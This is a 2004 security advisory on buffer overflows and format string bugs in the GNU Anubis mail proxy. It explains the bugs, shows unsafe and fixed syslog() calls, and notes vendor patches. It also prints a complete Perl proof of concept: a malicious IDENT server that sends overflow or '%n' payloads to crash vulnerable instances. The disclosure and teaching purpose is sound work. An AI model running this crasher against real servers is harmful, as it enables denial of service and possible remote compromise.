Posted Mar 5, 2004
Authored by Ulf Harnhammar

GNU Anubis is vulnerable to multiple buffer overflow attacks and format string bugs. Vulnerable versions: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1, possibly others

tags | advisory, overflow
SHA-256 | b0fe1f61d8763fc679ba6f83853b5115d77c1101fb9f753f2ba402ca8da4f1e1


GNU Anubis buffer overflows and format string bugs

VENDOR: Free Software Foundation, Inc.
HOMEPAGE: http://www.gnu.org/software/anubis/
VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1,
possibly others
IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch,
latest CVS


"GNU Anubis is an outgoing mail processor. It goes between the MUA
(Mail User Agent) and the MTA (Mail Transport Agent), and can perform
various sorts of processing and conversion on-the-fly in accordance
with the sender's specified rules, based on a highly configurable
regular expressions system. It operates as a proxy server, and can
edit outgoing mail headers, encrypt or sign mail with the GnuPG,
build secure SMTP tunnels using the TLS/SSL encryption even if your
mail user agent doesn't support it, or tunnel a connection through
a SOCKS proxy server."

(quoted from freshmeat.net)


I have found two buffer overflows and three format string bugs
in GNU Anubis. They can all be remotely exploited, potentially to
get root access, as GNU Anubis usually runs as root and drops its
privileges after executing some of the vulnerable functions.


a) There are two buffer overflows in the function auth_ident()
in auth.c. They are caused by sscanf() conversions of the form "%s",
which copy as much as the remote IDENT server sends into a
fixed-size buffer, where a bounded conversion such as "%63s" (buffer
size minus one, leaving room for the terminating NUL) was needed.

b) There are format string bugs in three instances of the syslog()
call. They are located in the function info() in log.c, the
function anubis_error() in errs.c and the function ssl_error()
in ssl.c. The vulnerable functions take strings partially made up
of user-supplied data and pass them as the format string instead
of as a parameter ('syslog(priority, string);' instead of
'syslog(priority, "%s", string);'), so any '%' conversions in the
user-supplied part are interpreted by syslog(). These format string
bugs become a bigger problem if termlevel is set to VERBOSE or DEBUG,
as GNU Anubis will then log more data through the syslog() facility.
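The following added example, written for this page and not taken from GNU Anubis's log.c, errs.c or ssl.c, shows the two syslog() call shapes side by side. Because syslog() writes to the system log, a small printf-style sink that formats into an inspectable buffer stands in for it; the sink, the message text and the function names are assumptions of this example. The probe input uses "%%" rather than "%n" so the demonstration stays deterministic and well-defined: it is the one directive that is harmless without an argument yet still proves the input is being parsed as a format.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(3) written for this page: like syslog() it treats
 * its first argument as a printf format, but it writes into a buffer we
 * can inspect instead of the system log. */
static char last_log[256];

const char *log_sink(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_log, sizeof last_log, fmt, ap);
    va_end(ap);
    return last_log;
}

/* The pattern the advisory describes: a message that embeds client data
 * is handed to the logger as the format string.  Every '%' the client
 * sent is then parsed as a conversion ("%x" leaks stack words, "%n"
 * writes to memory). */
const char *report_unsafe(const char *client_input)
{
    char msg[200];
    snprintf(msg, sizeof msg, "client said: %s", client_input);
    return log_sink(msg);            /* BUG: syslog(priority, string); */
}

/* Fixed form: the message is an argument to a constant "%s" format, so
 * its contents are copied and never interpreted. */
const char *report_safe(const char *client_input)
{
    char msg[200];
    snprintf(msg, sizeof msg, "client said: %s", client_input);
    return log_sink("%s", msg);      /* syslog(priority, "%s", string); */
}

/* Audit helper: number of conversions a string would introduce if it
 * were ever used as a format.  "%%" is a literal percent and is not
 * counted. */
int format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%": skip the escaped pair */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed probe: "%%" collapses to "%" only when interpreted. */
    const char *probe = "100%% done";
    printf("unsafe: %s\n", report_unsafe(probe));   /* the %% was consumed */
    printf("safe:   %s\n", report_safe(probe));     /* logged verbatim */
    printf("conversions in \"%%n%%n\": %d\n", format_directives("%n%n"));
    return 0;
}
```

If the real logging wrapper is declared with `__attribute__((format(printf, 1, 2)))`, compiling with `-Wall -Wformat=2 -Wformat-security` flags the `log_sink(msg)` call at build time, which is the cheapest way to find the remaining instances of this pattern in a code base.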


The vendor has released official security patches for 3.6.2 and
3.9.93. They can be downloaded from the program's homepage. They
correct both the buffer overflows and the format string bugs.


One of the methods of attacking GNU Anubis is through IDENT data,
as it always connects to the client's IDENT server to get more
information about the client. I wrote a simple malicious IDENT
server in Perl. It crashes the current instance of GNU Anubis, either
by using the buffer overflows or by using the format string bugs.
Here it is:

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.
#
# Malicious IDENT (RFC 1413) server: listens on tcp/113 and answers every
# lookup with a USERID reply whose user-id field carries the payload, which
# the vulnerable GNU Anubis feeds to sscanf() (type 'a') or syslog() (type 'b').

use strict;
use warnings;
use IO::Socket;

sub usage {
    die "usage: $0 type\n".
        "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
} # sub usage

my $port = 113;

usage() unless @ARGV == 1;
my $type = shift;
usage() unless $type =~ m|^[ab]$|;

my %send;
$send{'a'} = 'U' x 400;   # overruns the fixed-size buffer behind "%s"
$send{'b'} = '%n' x 28;   # each %n writes to memory when used as a format
my $sendstr = $send{$type};

my $server = IO::Socket::INET->new(Proto     => 'tcp',
                                   LocalPort => $port,
                                   Listen    => SOMAXCONN,
                                   Reuse     => 1) or
    die "can't create server: $!";

while (my $client = $server->accept()) {
    print "got a connection\n";

    my $input = <$client>;
    $input = '' unless defined $input;
    $input =~ tr/\015\012//d;
    print "client said $input\n";

    # $wait = <STDIN>;
    # $wait = 'be quiet, perl -wc';

    # Fake RFC 1413 reply; the payload sits in the user-id field.
    my $output = "a: USERID: a:$sendstr";
    print $client "$output\n";
    print "I said $output\n";

    close $client;
    print "disconnected\n";
} # while client=server->accept


* 31337 IRC KIDDIES *

K: "w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1!
but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz
phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty
c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't
pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly
cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3
1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n
1ph 1 ph1nd xss h0l3zZz!!!!11!!!1!!11!!!!"

U: "Virgin."

(Anyone on IRC who doesn't behave like K here is of course OK.)

// Ulf Harnhammar
kses - 31337 PHP HTML/XHTML filter (no XSS)
